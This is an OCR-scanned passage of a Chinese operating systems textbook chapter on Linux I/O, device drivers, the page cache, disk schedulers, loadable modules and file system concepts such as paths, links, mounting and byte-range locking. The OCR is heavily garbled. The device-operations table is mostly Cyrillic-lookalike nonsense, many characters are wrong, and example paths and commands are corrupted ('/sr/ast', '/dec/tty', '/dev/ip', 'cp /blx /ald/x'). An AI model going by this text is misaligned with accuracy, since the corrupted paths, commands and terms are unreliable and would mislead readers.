对 称 性 仍然 存在 ， 一 些 电话 公司 提供 8Mbps 的 人 站 服务 和 512kbps 的 出 站 服务 ， 称 为 ADSL ( 非 对 称 数字 
用 户 环线 ) 。 

列表 中 的 最 后 两 个 系统 调用 主要 用 来 设置 和 读 回 所 有 用 来 消除 字符 和 行 以 及 中 断 进程 等 功能 的 特殊 
字符 。 另 外 ， 它 们 可 以 使 同 显 有 效 或 无 效 ， 管 理 流 控制 及 其 他 相关 功能 。 还 有 一 些 IO 功能 调用 ， 但 是 
它们 都 是 专用 的 ， 所 以 这 里 就 不 进一步 讨论 了 。 此 外 ，ioctl 系 统 调用 依然 可 用 。 


10.5.4 输入 /输出 在 Linux 中 的 实现 

在 Linux 中 IO 是 通过 一 系列 的 设备 驱动 来 实现 的 ， 每 个 设备 类 型 对 应 一 个 设备 驱动 。 设 备 驱动 的 功 
能 是 对 系统 的 其 他 部 分 隔离 硬件 的 细节 。 通 过 在 驱动 程序 和 操作 系统 其 他 部 分 之 间 提供 一 层 标准 的 接口 ， 
使 得 大 部 分 MO 系统 可 以 被 划 归 到 内 核 的 机 器 无 关 部 分 。 

当 用 户 访问 一 个 特殊 文件 时 ， 由 文件 系统 提供 此 特殊 文件 的 主 设备 号 和 次 设备 号 ， 并 判断 它 是 -个 
块 特殊 文件 还 是 一 个 字符 特殊 文件 。 主 设备 号 用 于 索引 存 有 字符 设备 或 者 块 设备 数据 结构 的 两 个 内 部 散 
列表 之 一 。 定 位 到 的 数据 结构 包含 指向 打开 设备 、 读 设备 、 写 设 备 等 功能 的 函数 指针 。 次 设备 号 被 当 作 
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参数 传递 。 在 Linux 系 统 中 添加 一 个 新 的 设备 类 型 ， 意 味 着 要 向 这 些 表 添加 一 个 新 的 表 项 ， 并 提供 相应 
的 函数 来 处 理 此 设备 上 的 各 种 操作 。 

图 10-21 展 示 了 一 部 分 可 以 跟 不 同 的 字符 设备 关联 的 操作 。 每 一 行 指向 一 个 单独 的 1/O 设 备 ( 即 一 个 
单独 的 驱动 程序 )。 列 表示 所 有 的 字符 驱动 程序 必须 支持 的 功能 。 还 有 几 个 其 他 的 功能 。 当 一 个 操作 要 
在 一 个 字符 特殊 文件 上 执行 时 ， 系 统 通过 检索 字符 设备 的 散 列表 来 选择 合适 的 数据 结构 ， 然 后 调用 相应 
的 功能 来 执行 此 操作 。 因 此 ， 每 个 文件 操作 都 包含 指向 相应 驱动 程序 的 一 个 函数 指针 。 


г 


设备 Open Close Read Write loct! 其 他 
[мш ul | пш nul | пш null 
”内 存 null null | тет геад | mem_write | пи 
键盘 К_ореп | kclose | kread error косі. 
[ ту Чу_ореп | Му сіоѕе | Му read | ty write | пу iocll 
打印 机 | 1р ореп | 1р сюзе | error 1р write | ip_ioctl 


图 10-21 典型 字符 设备 支持 的 部 分 文件 操作 


每 个 驱动 程序 都 分 为 两 部 分 。 这 两 部 分 都 是 Linux 内 核 的 一 部 分 ， 并 且 都 运行 在 内 核 态 。 上 半 部 分 
运行 在 调用 者 的 上 下 文 并 且 与 Linux 其 他 部 分 交互 。 下 半 部 分 运行 在 内 核 上 下 文 并 且 与 设备 进行 交互 。 
驱动 程序 可 以 调用 内 存 分 配 、 定 时 器 管理 、DMA 控 制 等 内 核 过 程 。 所 有 可 以 被 调用 的 内 核 功能 都 定义 
在 一 个 叫做 驱动 程序 一 内 核 接口 (Driver-Kemnel Interface) 的 文档 中 。 编 写 Linux 设 备 驱 动 的 细节 请 参见 
文献 (Egan 和 Teixeira，1992，Rubini 等 人 ，2005) 。 

1/O 系 统 被 划分 为 两 大 部 分 ， 处 理 块 特殊 文件 的 部 分 和 处 理 字符 特殊 文件 的 部 分 。 下 面 将 依次 讨论 
这 两 部 分 。 

系统 中 处 理 块 特殊 文件 (比如 ， 磁 盘 ) 1/0 的 部 分 的 目标 是 使 必须 要 完成 的 传输 次 数 最 小 。 为 了 实 
现 这 个 目标 ，Linux 系 统 在 磁盘 驱动 程序 和 文件 系统 之 间 放 置 了 一 个 高 速 绠 存 (cache)， 如 图 10-22。 在 
2.2 版 本 内 核 之 前 ，Linux 系 统 完整 地 维护 着 两 个 单独 的 缓存 : ABA (раве cache) 和 缓冲 器 缓存 
(buffer cache) ， 因 此 ， 存 储 在 一 个 磁盘 块 中 的 文件 可 能 会 被 缓存 在 两 个 缓存 中 。2.2 版 本 以 后 的 Linux 内 
核 版 本 只 有 一 个 统一 的 缓存 。 一 个 通用 数据 块 层 (generic block layer) 把 这 些 组 件 整合 在 了 一 起 ， 执 行 
磁盘 遍 区 、 数 据 块 、 缓 冲 区 和 数据 页 面 之 间 必 要 的 转换 ， 并 且 激 活 作用 于 这 些 结构 上 的 操作 。 

cache 是 内 核 里 面 用 来 保存 数 以 千 计 的 最 近 使 用 的 数据 块 的 表 。 不 管 本 着 什么 样 的 目的 (i 节点 ， 目 
录 或 数据 ) 而 需要 一 个 磁盘 块 ， 系 统 首先 检查 这 个 块 是 否 在 cache 里 面 。 如 果 在 cache 中 ， 就 可 以 从 cache 
里 直接 得 到 这 个 块 ， 从 而 避免 了 一 次 磁盘 访问 ， 这 可 以 在 很 大 程度 上 提高 系统 性 能 。 


虚拟 文件 系统 


图 10-22 Linux IO 系统 中 一 个 文件 系统 的 细节 
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如 果 页 面 cache 中 没有 这 个 块 ， 系 统 就 会 从 磁盘 中 把 这 个 块 读 人 到 cache 中 ， 然 后 再 从 cache 中 复制 到 
请 求 它 的 地 方 。 由 于 页 面 cache 的 大 小 是 固定 的 ， 因 此 ， 前 面 章节 介绍 的 页 面 置 换算 法 在 这 里 也 是 需要 的 。 

页 面 cache 也 支持 写 数据 块 ， 就 像 读 数据 一 样 。 一 个 程序 要 回 写 一 个 块 时 ， 它 被 写 到 cache 里 ， 而 不 
是 直接 写 到 磁盘 上 。 当 cache 增 长 到 超过 一 个 指定 值 时 ，pdflush 守 护 进程 会 把 这 个 块 写 回 到 磁盘 上 。 另 
外 ,为 了 防止 数据 块 被 写 回 到 磁盘 之 前 在 cache 里 存留 太 长 时 间 ， 每 隔 30 秒 系统 会 把 所 有 的 “ 脏 块 ”都 
写 回 到 磁盘 上 。 

Linux 依 靠 一 个 1/O 调 度 器 来 保证 磁头 反复 移动 的 延迟 最 小 。1/O 调 度 器 的 作用 是 对 块 设备 的 读 写 请 
求 重新 排序 或 对 这 些 读 写 请 求 进行 合并 。 有 很 多 调度 器 变种 ， 它 们 是 根据 不 同类 型 的 工作 负载 进行 优化 
的 结果 。 基 本 的 Linux IO 调度 器 基于 最 初 的 Linus 电 梯 调 度 器 (Linus Elevator scheduler)。 电 梯 调 度 器 
的 操作 可 以 这 样 总 结 ， 按 磁盘 请 求 的 扁 区 地 址 的 顺序 将 磁盘 操作 在 一 个 双向 链表 中 排序 。 新 的 请 求 以 排 
序 的 方式 插入 到 双向 链表 中 。 这 种 方法 可 以 有 效 地 防止 磁头 重复 移动 。 请 求 列表 经 过 合并 后 ， 相 邻 的 操 
作 会 被 整合 为 一 条 单独 的 磁盘 请 求 。 基 本 电梯 调度 器 有 一 个 问题 是 会 导致 饥饿 的 情况 发 生 。 因 此 ， 
Linux 磁 盘 调度 器 的 修改 版 本 包括 两 个 附加 的 列表 ， 维 护 按时 限 (deadline) 排序 的 读 写 操作 。 读 请 求 的 
缺 省 时 限 是 0.5s， 写 请 求 的 缺 省 时 限 是 $s。 如 果 最 早 的 写 操作 的 系统 定义 的 时 限 要 过 期 了 ， 那么 相对 于 
任何 在 主 双 向 链表 中 的 请 求 来 说 ， 这 个 写 请 求 会 被 优先 服务 。 

除了 正常 的 磁盘 文件 ， 还 有 其 他 的 块 特殊 文件 ， 也 被 称 为 原始 块 文件 (raw block file), 这 些 文件 
人 允许 程序 通过 绝对 块 号 来 访问 磁盘 ， 而 不 考虑 文件 系统 。 它们 通常 被 用 于 分 页 和 系统 维护 。 

与 字符 设备 的 交互 是 很 简单 的 。 因 为 字符 设备 产生 和 接收 的 是 字符 流 或 字 节 数据 ， 所 以 让 字符 设备 
支持 随机 访问 是 几乎 没有 意义 的 。 不 过 行规 则 (line disciplines) 的 使 用 是 个 例外 。 一 个 行规 则 可 以 和 一 
个 终端 设备 联合 在 一 起 ， 通 过 tty_struct 结 构 来 表示 ， 一 般 作为 和 终端 交换 的 数据 的 解释 器 。 例 如 ， 利 用 
行规 则 可 以 完成 本 地 行 编辑 〈 即 控 除 的 字符 和 行 可 以 被 删除 ) ， 回 车 可 以 映射 为 换行 ， 以 及 其 他 的 特殊 
处 理 能 够 被 完成 。 然 而 ， 如 果 一 个 进程 要 跟 每 个 字符 交互 ， 那么 它 可 以 把 行 设置 为 原始 模式 ， 此 时 行规 
则 将 被 忽略 。 另 外 ， 并 不 是 所 有 的 设备 都 有 行规 则 。 

输出 采用 与 输入 类 似 的 工作 方式 ， 如 把 tab 扩 展 为 空格 ， 把 换行 转变 为 回 车 + 换行 ， 在 慢 的 机 械 式 
终端 的 回 车 后 面 加 填充 字符 等 。 像 输入 一 样 ， 输 出 可 以 通过 (加工 模式 ) 行规 则 ， 或 者 忽略 (原始 模式 ) 
行规 则 。 原始 模式 对 于 GUI 和 通过 一 个 串 行 数 据 线 发 送 二 进 制 数据 到 其 他 的 计算 机 的 情况 尤其 有 用 ， 因 
为 这 些 情况 都 不 需要 进行 转换 。 

和 网 络 设备 的 交互 与 前 面 的 讨论 有 些 不 同 。 虽然 网 络 设备 也 是 产生 或 者 接收 字符 流 ， 但 是 它们 的 异 
步 特 性 使 得 它们 并 不 适合 与 其 他 的 备 统一 使 用 相同 的 接口 。 网 络 设备 驱动 程序 产生 具有 多 个 字 节 
的 数据 包 和 网 络 头 。 接 着 ， 这 些 包 会 经 过 一 连 串 的 网 络 协议 驱动 程序 传送 ， 最 后 被 发 送 到 用 户 空间 应 用 
程序 。 套 接 字 缓 冲 区 ，skbuff， 是 一 个 关键 的 数据 结构 ， 它 用 来 表示 填 有 包 数 据 的 部 分 内 存 。skbuff 缓 促 
区 里 面 的 数据 并 不 总 是 始 于 缓冲 区 的 开始 位 置 ， 因 为 它们 被 网 络 栈 中 的 不 同 协议 处 理 过 ， 可 能 会 添加 或 
删除 协议 头 。 用 户 进程 通过 套 接 字 与 网 络 设备 进行 交互 ， 在 Linux 中 支持 原始 的 BSD 的 套 接 字 API。 通 过 
raw-_sockets， 协 议 驱 动 程序 可 以 被 忽略 ， 从 而 可 以 实现 对 底层 网 络 设备 的 直接 访问 。 只 有 超级 用 户 才 可 
以 创建 原始 套 接 字 (raw socket), 


10.5.5 Linux 中 的 模块 

几 十 年 来 ，UNIX 设 备 驱动 程序 是 被 静态 链接 到 内 核 中 的 。 因 此 ， 只 要 系统 启动 ， 设备 驱动 程序 都 
会 被 加 载 到 内 存 中 。 在 UNIX 比 较 成 熟 的 环境 中 ， 如 大 部 分 的 部 门 小 型 计算 机 以 及 高 端的 工作 站 ， 其 共 
同 的 特点 是 MO 设备 集 都 较 小 并 且 稳定 不 变 ， 这 种 模式 工作 得 很 好 。 基 本 上 ， 一 个 计算 机 中 心 会 构造 一 
个 包含 MO 设备 驱动 程序 的 内 核 ， 并 且 一 直 使 用 它 。 如 果 第 二 年 ， 这 个 中 心 买 了 一 个 新 的 磁盘 ， 那 么 重 
新 链接 内 核 就 可 以 了 。 一 点 问题 也 没有 。 

随 着 个 人 电脑 平台 Linux 系 统 的 到 来 ， 所 有 这 些 都 改变 了 。 相对 于 任何 一 台 小 型 机 上 的 VO 设备 ，PC 机 
上 可 用 LO 设备 的 数量 都 有 了 数量 级 上 的 增长 。 另 外 ， 虽 然 所 有 的 Linux 用 户 都 有 (或 者 很 容易 得 到 ) Linux 
源 代码 ， 但 是 绝 大 部 分 用 户 都 没有 能 力 去 添加 一 个 新 的 驱动 程序 、 更 新 所 有 的 设备 驱动 程序 数据 结构 、 重 
链接 内 核 ， 然 后 把 它 作为 可 启动 的 系统 进行 安装 (更 不 用 提要 处 理 构造 完成 后 内 核 不 能 启动 的 问题 ) 。 
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Linux 为 了 解决 这 个 问题 ， 引 入 了 可 加 载 模块 (loadable module) 的 概念 。 可 加 载 模块 是 在 系统 运 
行 时 可 以 加 载 到 内 核 的 代码 块 。 大 部 分 情况 下 ， 这 些 模块 是 字符 或 者 块 设备 驱动 ， 但 是 它们 也 可 以 是 完 
整 的 文件 系统 、 网 络 协议 、 性 能 监控 工具 或 者 其 他 想 要 添加 的 模块 。 

当 一 个 模块 被 加 载 到 内 核 时 ， 会 发 生 下 面 几 件 事 。 第 一 ， 在 加 载 过 程 中 ， 模 块 会 被 动态 地 重新 部 署 。 
第 二 ， 系 统 会 检查 这 个 驱动 程序 需要 的 资源 是 否 可 用 〈 例 如 ， 中 断 请 求 级 别 )。 如 果 有 效 ， 则 把 这 些 资源 
标记 为 正在 使 用 。 第 三 ， 设 置 所 有 需要 的 中 断 向 量 。 第 四 ,更 新 驱动 转换 表 使 其 能 够 处 理 新 的 主 设备 类 型 。 
最 后 ， 运 行 驱动 程序 来 完成 可 能 需要 的 特定 设备 的 初始 化 工作 。 一 旦 上 述 所 有 的 步骤 都 完成 了 ， 这 个 驱动 
程序 就 安装 完成 了 ， 也 就 和 静态 安装 的 驱动 程序 一 样 了 。 其 他 现代 的 UNIX 系 统 也 支持 可 加 载 模块 。 


10.6 Linux 文 件 系统 

在 包括 Linux 在 内 的 所 有 操作 系统 中 ， 最 可 见 的 部 分 是 文件 系统 。 在 本 节 的 以 下 部 分 ， 我 们 将 介绍 
隐藏 在 Linux 文 件 系统 、 系 统 调用 以 及 文件 系统 实现 背后 的 基本 思想 。 这 些 思想 中 有 一 些 来 源 于 
MULTICS， 虽 然 有 很 多 已 经 被 MS-DOS、Windows 和 其 他 操作 系统 使 用 过 了 ， 但 是 其 他 的 都 是 UNIX 类 
操作 系统 特有 的 。Linux 的 设计 非常 有 意思 ， 因 为 它 忠 实地 秉承 了 “小 的 就 是 美好 的 ”(Small is 
Beautiful) 的 设计 原则 。 虽 然 只 是 使 用 了 最 简 的 机 制 和 少量 的 系统 调用 ， 但 是 Linux 却 提供 了 强大 的 和 
优美 的 文件 系统 。 


10.6.1 基本 概念 

最 初 的 Linux 文 件 系统 是 MINIX 1 文件 系统 。 但 由 于 它 只 能 支持 14 字 节 的 文件 名 (为 了 和 UNIX 
Version 7 兼容 ) 和 最 大 64MB 的 文件 (这 在 只 有 10MB 硬 盘 的 年 代 是 足够 强大 的 ) ， 在 Linux 刚 被 开发 出 来 
的 时 候 ， 开 发 者 就 意识 到 需要 开发 更 好 的 文件 系统 (开始 于 MINIX 1 发 布 的 5 年 后 ) 。 对 MINIX 1 文件 系 
统 进行 第 一 次 改进 后 的 文件 系统 是 ext 文 件 系统 。ext 文 件 系统 能 支持 255 个 字符 的 文件 名 和 2GB 的 文件 大 
小 ， 但 是 它 的 速度 比 MINIX 1 慢 ， 所 以 仍然 有 必要 对 它 进行 改进 。 最 终 ，ext2 文 件 系统 被 开发 出 来 ， 它 
能 够 支持 长 文件 名 和 大 文件 ， 并 且 具 有 更 好 的 性 能 ， 这 使 得 它 成 为 了 Linux 主 要 的 文件 系统 。 不 过 ， 
Linux 使 用 虚拟 文件 系统 (VFS) 层 支持 很 多 类 型 的 文件 系统 (VFS 将 在 下 文 介绍 )。 在 Linux 链 接 时 ， 用 
户 可 以 选择 要 构造 到 内 核 中 的 文件 系统 。 如 果 需 要 其 他 文件 系统 ， 可 以 在 运行 时 作为 模块 动态 加 载 。 

Linux 中 的 文件 是 一 个 长 度 为 0 或 多 个 字 节 的 序列 ， 可 以 包含 任意 的 信息 。ASCII 文 件 、 二 进 制 文件 
和 其 他 类 型 的 文件 是 不 加 区 别 的 。 文 件 中 各 个 位 的 含义 完全 由 文件 所 有 者 确定 ， 而 文件 系统 不 会 关心 。 
文件 名 长 度 限制 在 255 个 字符 内 ， 可 以 由 除了 NUL 以 外 的 所 有 ASCII 字 符 构成 ， 也 就 是 说 ， 一 个 包含 了 三 
个 回 车 符 的 文件 名 也 是 合法 的 但 是 这 样 命名 很 不 方便 )。 

按照 惯例 ， 许 多 程序 能 识别 的 文件 包含 一 个 基本 文件 名 和 一 个 扩展 名 ， 中 间 用 一 个 点 连接 (点 也 被 
认为 是 占用 了 文件 名 的 一 个 字符 )。 例 如 一 个 名 为 prog.c 的 文件 是 一 个 典型 的 C 源 文件 ，prog.f90 是 一 个 
典型 的 FORTRAN 90 程 序 文件 ， 而 prog.o 通 常 是 一 个 object 文 件 (编译 器 的 输出 文件 )。 这 个 惯例 不 是 操 
作 系 统 要 求 的 ， 但 是 一 些 编译 器 和 程序 希望 是 这 样 ， 比 如 一 个 名 为 prog java.gz 的 文件 可 能 是 一 个 gzip 压 


缩 的 Java 程 序 。 
为 了 方便 ， 文 件 可 以 被 组 织 在 一 个 目录 里 。 目 录 aa = Ес е J 

存储 成 文件 的 形式 并 且 在 很 大 程度 上 可 以 作为 文件 处 a ТОЕ 

理 。 目 录 可 以 包含 子 目 录 ， 这 样 可 以 形成 有 层次 的 文 上 ж [айт 

件 系统 。 根 目录 表示 为 “/"， 它 通常 包含 了 多 个 子 目录 。 而 ж 

字符 “/” 还 用 于 分 离 目 录 名 ， 所 以 /usr/ast/x 实 际 上 是 ur 用 户 目录 

说 文件 x 位 于 目录 ast 中 ， 而 目录 ast 位 于 /usr 目 录 中 。 表 

10-23 列 举 了 根 目录 下 几 个 主要 的 目录 及 其 内 容 。 图 10-23 大 部 分 Linux 系 统 中 一 些 重要 的 目录 


在 Linux 中 ， 不 管 是 对 shell 还 是 一 个 打开 文件 的 程序 来 说 ， 都 有 两 种 方法 表示 一 个 文件 的 文件 名 。 
第 一 种 方法 是 使 用 绝对 路 径 ， 绝 对 路 径 告 诉 系 统 如 何 从 根 目 录 开 始 查找 一 个 文件 。 例 如 
/sr/ast/books/mos3/chap-10， 这 个 路 径 名 告诉 系统 在 根 目录 里 寻找 一 个 叫 usr 的 目录 ， 然 后 再 从 usr 中 导 
找 ast 目 录 …… 依 照 这 种 方式 ， 最 终 找到 chap-10 文 件 。 
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绝对 路 径 的 缺点 是 文件 名 太 长 并 且 不 方便 。 因 为 这 个 原因 ，Linux 允 许 用 户 和 进程 把 他 们 当前 工作 
的 目录 标识 为 工作 目录 ， 这 样 路 径 名 就 可 以 相对 于 工作 目录 命名 ,这 种 方式 命名 的 目录 名 叫做 相对 路 径 。 
例如 ， 如 果 /usr/astbooks/mos3 是 工作 目录 ， 那 么 shell 命 令 

cp chap-10 backup-10 
和 长 命令 cp /usr/ast/books/mos3/chap-10/usr/ast/books/mos3/ backup-10 的 效果 是 一 样 的 。 

一 个 用 户 要 使 用 属于 另 一 个 用 户 的 文件 或 者 使 用 文件 树 结构 里 的 某 个 文件 的 情况 是 经 常 发 生 的 。 例 
如 ， 两 个 用 户 共享 一 个 文件 ， 这 个 文件 位 于 其 中 某 个 用 户 所 拥有 的 目录 中 ， 另 一 个 用 户 需要 使 用 这 个 文 
件 时 ， 必 须 通过 绝对 路 径 才 能 引用 它 (或 者 通过 改变 工作 目录 的 方式 )。 如 果 绝对 路 径 名 很 长 ， 那 么 每 次 
输入 时 将 会 很 麻烦 。 为 了 解决 这 个 问题 ，Linux 提 供 了 一 种 指向 已 存在 文件 的 目录 项 ， 称 作 链接 (link), 

以 图 10-24a 为 例 ， 两 个 用 户 Fred 和 Lisa 一 起 工作 来 完成 一 个 项 目 ， 他 们 需要 访问 对 方 的 文件 。 如 果 
Fred 的 工作 目录 是 /usr/fred， 他 可 以 使 用 /usr/lisa/x 来 访问 Lisa 目 录 下 的 文件 x。Fred 也 可 以 如 图 10-24b 所 
示 的 方法 ， 在 自己 目录 下 创建 一 个 链接 ， 然 后 他 就 可 以 用 x 来 代 赫 /usr/lisa/x 了 。 

在 上 面 的 例子 中 ， 我 们 说 在 创建 链接 之 前 ，Fred 引 用 Lisa 的 文件 x 的 惟一 方法 是 使 用 绝对 路 径 。 实 
际 上 这 并 不 正确 ， 当 一 个 目录 被 创建 出 来 时 ， 有 两 个 目录 项 “.” 和 “..” 被 自动 创建 出 来 存放 在 该 目录 
中 ， 前 者 代表 工作 目录 自身 ， 而 后 者 表示 该 目录 的 父 目录 ， 也 就 是 该 目录 所 在 的 目录 。 这 样 一 来 ， 在 
/usr/fred 目 录 中 访问 Lisa 的 文件 x 的 另 一 个 路 径 是 : .lisa/x。 

除了 普通 的 文件 之 外 ，Linux 还 支持 字符 特殊 文件 和 块 特殊 文件 。 宁 符 特 殊 文 件 用 来 建 模 捉 行 1/O 设 
备 ， 比 如 键盘 和 打印 机 。 如 果 打开 并 从 /dec/tty 中 读 取 内 容 ， 等 于 从 键盘 读 取 内 容 ， 而 如 果 打开 并 向 
/dev/ip 中 写 内 容 ， 竺 于 向 打印 机 输出 内 容 。 块 特殊 文件 通常 有 类 似 于 /dev/hd1 的 文件 名 ， 它 用 来 直接 向 
硬盘 分 区 中 读 取 和 写 和 人 内容， 而 不 需要 考虑 文件 系统 。 一 个 偏 移 为 字 节 的 read 操 作 ， 将 会 从 相应 分 区 开 
始 的 第 k 个 字 节 开始 读 取 ， 而 完全 忽略 i 节点 和 文件 的 结构 。 原 始 块 设备 常 被 一 些 建立 (如 mkfs) 或 修补 
(如 fsck) 文件 系统 的 程序 用 来 进行 分 页 和 交换 。 

许多 计算 机 有 两 块 或 更 多 的 磁盘 。 银 行使 用 的 大 型 机 ， 为 了 存储 大 量 的 数据 ， 通 常 需要 在 一 台 机 器 
上 安装 100 个 或 更 多 的 磁盘 。 甚 至 在 PC 上 也 至 少 有 两 块 磁 航 一 一 一 块 硬盘 和 一 个 光盘 驱动 器 (如 DVD)。 
当 一 台 机 器 上 安装 了 多 个 磁盘 的 时 候 ， 如 何 处 理 它们 就 是 一 个 问题 。 

一 个 解决 方法 是 在 每 一 个 磁盘 上 安装 自 包含 的 文件 系统 ， 使 它们 之 间 互 相 独 立 。 考 虑 如 图 10-25a 所 
示 的 解决 方法 ， 有 一 个 硬盘 C: 和 一 个 DVD D:， 它 们 都 有 自己 的 根 目录 和 文件 。 如 果 使 用 这 种 解决 方法 ， 
除了 默认 冀 外 ， 使 用 者 必须 指定 设备 和 文件 ， 例 如 ， 要 把 文件 x 复制 到 目录 d 中 (假设 C: 是 默认 盘 )， 应 
该 使 用 命令 

cp D:/x /ald/x 
这 种 方法 被 许多 操作 系统 使 用 ， 包 括 MS-DOS、Windows 98 和 VMS。 
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图 10-24 a) 链接 前 ，b) 链接 后 图 10-25 а) 分 离 的 文件 系统 ，b) 挂 载 之 后 


Linux 的 解决 方法 是 允许 一 个 磁盘 挂 载 到 另 一 个 磁盘 的 目录 树 上， 比如， 我 们 可 以 把 DVD 挂 载 在 目 
录 /b 上 ， 构 成 如 图 10-25b 所 示 的 文件 系统 。 挂 载 之 后 ， 用 户 能 够 看 见 一 个 目录 树 ， 而 不 再 需要 关心 文件 
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在 哪个 设备 上 ， 上 面 提 到 的 命令 就 可 以 变 成 

cp /blx /ald/x 
和 所 有 文件 都 在 硬盘 上 是 一 样 的 。 

Linux 文 件 系统 的 另 一 个 有 趣 的 性 质 是 加 锁 (locking)。 在 一 些 应 用 中 会 出 现 两 个 或 更 多 的 进程 同时 
使 用 同一 个 文件 的 情况 ， 可 能 导致 竞争 条 件 (race condition)。 有 一 种 解决 方法 是 使 用 临界 区 ， 但 是 如 
果 这 些 进程 属于 相互 不 认识 的 独立 的 用 户 ， 这 种 解决 方法 是 不 方便 的 。 

考虑 这 样 的 一 个 例子 ， 一 个 数据 库 组 织 许多 文件 在 一 个 或 多 个 目录 中 ， 它 们 可 以 被 不 相关 的 用 户 访 
间 。 可 以 通过 设置 信号 量 来 解决 互 斥 的 问题 ， 在 每 个 目录 或 文件 上 设置 一 个 信号 量 ， 当 程序 需要 访问 相 
应 的 数据 时 ， 在 相应 的 信号 量 上 做 一 个 own 操作。 但 这 样 做 的 缺点 是 ， 尽 管 进程 只 需要 访问 一 条 记录 却 
使 得 整个 目录 或 文件 都 不 能 访问 。 

由 于 这 种 原因 ，POSIX 提 供 了 一 种 灵活 的 、 细 粒度 的 机 制 ， 允 许 一 个 进程 使 用 一 个 不 可 分 割 的 操作 对 
小 到 一 个 字 节 、 大 到 整个 文件 加 锁 。 加 锁 机 制 要 求 加 锁 者 标识 要 加 锁 的 文件 、 开 始 位 置 以 及 要 加 锁 的 字 节 
数 。 如 果 操 作成 功 ， 系 统 会 在 表格 中 添加 记录 说 明 要 求 加 锁 的 字 节 (如 数据 库 的 一 条 记录 ) 已 被 锁 住 。 

系统 提供 了 两 种 销 ， 共 享 锁 和 互 斥 锁 。 如 果 文 件 的 一 部 分 已 经 被 加 了 共享 锁 ， 那 么 在 上 面 尝试 加 共 
享 锁 是 允许 的 ， 但 是 加 互 斥 锁 是 不 会 成 功 的 ， 如 果 文件 的 一 部 分 已 经 被 加 了 互 斥 锁 ， 那么 在 互 斥 锁 解 除 
之 前 加 任何 锁 都 不 会 成 功 。 为 了 成 功 地 加 锁 ， 请 求 加 锁 的 部 分 的 所 有 字 节 都 必须 是 可 用 的 。 

在 加 锁 时 ， 进 程 必 须 指 出 当 加 锁 不 成 功 时 是 否 阻塞 。 如 果 选 择 阻塞 ， 则 当 已 经 存在 的 锁 被 删除 时 ， 
进程 被 放行 并 在 文件 上 加 锁 ， 如 果 选 择 不 阻塞 ， 系 统 调用 在 加 锁 失 败 时 立即 返回 ， 并 设置 状态 码 表明 加 
锁 是 否 成 功 ， 如 果 不 成 功 ， 由 调用 者 决定 下 一 步 动作 (比如 ， 等 待 或 者 继续 尝试 ) 。 

加 锁 区 域 可 以 是 重合 的 。 如 图 10-26a 所 示 ， 进 程 A 在 第 4 字 节 到 第 7 字 节 的 区 域 加 了 共享 锁 ， 之 后 ， 
进程 B 在 第 6 字 节 到 第 9 字 节 加 了 共享 锁 ， 如 图 10-26b 所 示 ， 最 后 ， 进程 C 在 第 2 字 节 到 第 11 字 节 加 了 共享 
锁 。 由 于 这 些 锁 都 是 共享 锁 ， 是 可 以 同时 存在 的 。 


进程 A 的 共享 锁 
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图 10-26 а) 加 了 一 个 锁 的 文件 ，b) 增加 了 第 二 个 锁 ，c) 增加 了 第 三 个 锁 


此 时 ， 如 果 一 个 进程 试图 在 图 10-26c 中 文件 的 第 9 个 字 节 加 互 斥 锁 ， 并 设置 加 锁 失 败 时 阻塞 ， 那么 
会 发 生 什么 ?由 于 该 区 域 已 经 被 进程 B 和 进程 C 两 个 进程 加 锁 ， 这 个 进程 将 会 被 阻塞 ， 直到 进程 B 和 进程 
C 释 放 它 们 的 锁 为 止 。 


10.6.2 Linux 的 文件 系统 调用 

许多 系统 调用 与 文件 和 文件 系统 有 关 。 在 本 节 中 ， 首先 研究 对 单个 文件 进行 操作 的 系统 调用 ， 之 后 
我 们 会 研究 针对 目录 和 文件 系统 的 系统 调用 。 要 创建 一 个 文件 时 ， 可 以 使 用 creat 系 统 调用 。( 曾 经 有 人 
[Кеп Thompson， 如 果 给 他 一 次 重新 发 明 UNIX 的 机 会 ， 他 会 做 什么 不 同事 情 ， 他 回答 说 他 要 把 这 个 系 
统 调用 的 拼写 改 成 create， 而 不 是 现在 的 creat, ) 这 个 系统 调用 的 参数 是 文件 名 和 保护 模式 。 于 是 ， 
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fd = creat("abc", mode); 
创建 了 一 个 名 为 abc 的 文件 ， 并 根据 mode 设 置 文件 的 保护 位 。 这 些 保护 位 决定 了 用 户 访问 文件 的 权限 及 
方式 。 在 下 文 将 会 具体 讨论 。 

creat 系 统 调用 不 仅 创 建 了 一 个 新 文件 ， 还 以 写 的 方式 打开 了 这 个 文件 。 为 了 使 以 后 的 系统 调用 能 
够 访问 这 个 文件 ，crealt 成 功 时 返回 一 个 非 负 整 数 ， 这 个 非 负 整数 叫 做 文件 描述 符 ， 也 就 是 例子 中 的 fd。 
如 果 creat 作 用 在 一 个 已 经 存在 的 文件 上 ， 那 么 该 文件 的 文件 长 度 会 被 截 短 为 0， 它 的 内 容 会 被 和 弃 。 通 
过 设置 合适 的 参数 ，open 系 统 调用 也 能 创建 文件 。 

现在 我 们 继续 讨论 图 10-27 列 出 的 主要 的 文件 系统 调用 。 为 了 读 或 写 一 个 已 经 存在 的 文件 ， 必 须 使 
用 open 系 统 调用 打开 这 个 文件 。 它 的 参数 是 要 打开 文件 的 文件 名 以 及 打开 方式 ， Rik, ERAH. 
外 ， 也 可 以 指定 不 同 的 选项 。 和 creat 一 样 ，open 返 回 一 个 文件 描述 符 ， 可 用 来 进行 读 写 。 然 后 可 以 使 
用 close 系 统 调用 来 关闭 文件 ， 它 使 得 文件 描述 符 可 以 被 后 来 的 creat 或 open 使 用 。creat 和 open 系 统 调 
用 总 是 返回 未 被 使 用 的 最 小 数值 的 文件 描述 符 。 

当 一 个 程序 以 标准 方式 运行 时 ， 文 件 描述 符 0、1、2 已 经 分 别 用 于 标准 输入 、 标 准 输出 和 标准 错误 。 
通过 这 种 方式 ， 一 个 过 滤器 ， 比 如 sort 程 序 ， 可 以 从 文件 描述 符 0 读 取 输入 ， 输 出 到 文件 描述 符 1， 而 不 
需要 关心 这 些 文件 是 什么 。 这 种 机 制 能 够 有 效 是 因为 shell 在 程序 启动 之 前 就 设置 好 了 它们 的 值 。 

毫 无 疑问 ， 最 常 使 用 的 文件 系统 调用 是 read 和 write。 它 们 每 个 都 有 三 个 参数 : 文件 描述 符 (标明 
要 读 写 的 文件 )、 缓 冲 区 地 址 (给 出 数据 存放 的 位 置 或 者 读 取 数据 的 位 置 ) ， 长 度 〈 给 出 要 传输 的 数据 的 
字 节 数 )。 这 些 就 是 全 部 了 。 这 种 设计 非常 简单 ， 一 个 典型 的 调用 方法 是 ， 


п = read(fd, buffer, nbytes); 


系统 调用 _ i ж =] 
